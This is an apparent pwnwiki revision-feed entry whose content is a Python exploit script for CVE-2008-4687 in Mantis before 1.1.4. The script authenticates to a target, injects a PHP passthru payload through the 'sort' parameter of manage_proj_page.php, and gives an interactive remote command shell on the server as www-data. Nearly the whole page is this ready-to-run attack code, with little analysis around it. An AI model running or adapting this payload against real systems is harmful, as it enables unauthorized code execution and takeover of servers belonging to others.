https://pwnwiki.com/index.php?action=history&feed=atom&title=CVE-2008-4687_Mantis%E4%BB%BB%E6%84%8F%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E 2026-04-10T23:19:15Z Revision history for this page on the wiki MediaWiki 1.35.1 https://pwnwiki.com/index.php?title=CVE-2008-4687_Mantis%E4%BB%BB%E6%84%8F%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E&diff=885&oldid=prev 2021-04-02T03:15:11Z

<p>Created page with &quot;==EXP== &lt;pre&gt; # Quick and dirty exploit for CVE-2008-4687. # Description by NIST: # manage_proj_page.php in Mantis before 1.1.4 allows remote authenticated users to # execute...&quot;</p> <p><b>New page</b></p><div>==EXP==<br /> &lt;pre&gt;<br /> # Quick and dirty exploit for CVE-2008-4687.<br /> # Description by NIST:<br /> # manage_proj_page.php in Mantis before 1.1.4 allows remote authenticated users to<br /> # execute arbitrary code via a sort parameter containing PHP sequences, which are p<br /> # rocessed by create_function within the multi_sort function in core/utility_api.php.<br /> # Author: Nelson Murilo<br /> # Date: 2020/02/15<br /> <br /> import requests<br /> import hashlib<br /> import base64<br /> import sys<br /> <br /> if len(sys.argv) != 5:<br /> print (&quot;Usage: pymantis host path user pass&quot;)<br /> exit(-1)<br /> <br /> host = sys.argv[1]<br /> path = sys.argv[2]<br /> user = sys.argv[3]<br /> pwd = sys.argv[4]<br /> <br /> urlbase = &quot;http://&quot; + host<br /> # just a little joke<br /> ua = 'Mozilla/5.0 (Nintendo WiiU) AppleWebKit/536.30 (KHTML, like Gecko) NX/3.0.4.2.12 NintendoBrowser/4.3.1.11264.US'<br /> p='PHPSESSID='+str(hashlib.md5('xploit'.encode()).hexdigest())<br /> <br /> d = { 'username':user , 'password': pwd }<br /> r = requests.Session()<br /> ret = r.get(urlbase + path + 'login_page.php')<br /> <br /> h = {<br /> 'Host': host,<br /> 'User-Agent': ua,<br /> 'Cookie': p,<br /> 'Connection': 'close'<br /> }<br /> ret = r.post(urlbase + path + 'login.php', data=d, headers=h)<br /> try:<br /> cookies = p + &quot;; ISSUES_STRING_COOKIE=&quot; + r.cookies['ISSUES_STRING_COOKIE']<br /> print(&quot;** Exploit works like a charm!&quot;)<br /> except:<br /> print(&quot;Ops! Exploit fail - Bye&quot;)<br /> quit()<br /> #<br /> # Poor man reverse shell<br /> #<br /> <br /> r.headers<br /> {<br /> 'Host': host,<br /> 'Cookie': cookies,<br /> 'Content-type': 'application/json; charset=utf-8',<br /> 'Connection': 'close'<br /> }<br /> pow = &quot;\']);}error_reporting(0);print(_code_);passthru(base64_decode($_SERVER[HTTP_CMD]));die;%23&quot;<br /> url = urlbase + path + 'manage_proj_page.php?sort=' + pow<br /> <br /> cmd = &quot;&quot;<br /> while True:<br /> cmd = input(&quot;www-data# &quot;)<br /> if not cmd:<br /> continue<br /> if cmd.lower() in {'exit'}:<br /> break<br /> h = {<br /> 'Host': host,<br /> 'User-Agent': ua,<br /> 'Cookie': cookies,<br /> 'Cmd': base64.b64encode(cmd.encode('utf-8')).decode('utf-8'),<br /> 'Connection': 'close'<br /> }<br /> ret = requests.get(url, headers=h)<br /> response = str(ret.content)<br /> for line in response.partition('_code_')[2].split(&quot;\\n&quot;):<br /> print(line.strip(&quot;\'&quot;))<br /> print(&quot;Bye&quot;)<br /> <br /> &lt;/pre&gt;</div>

Pwnwiki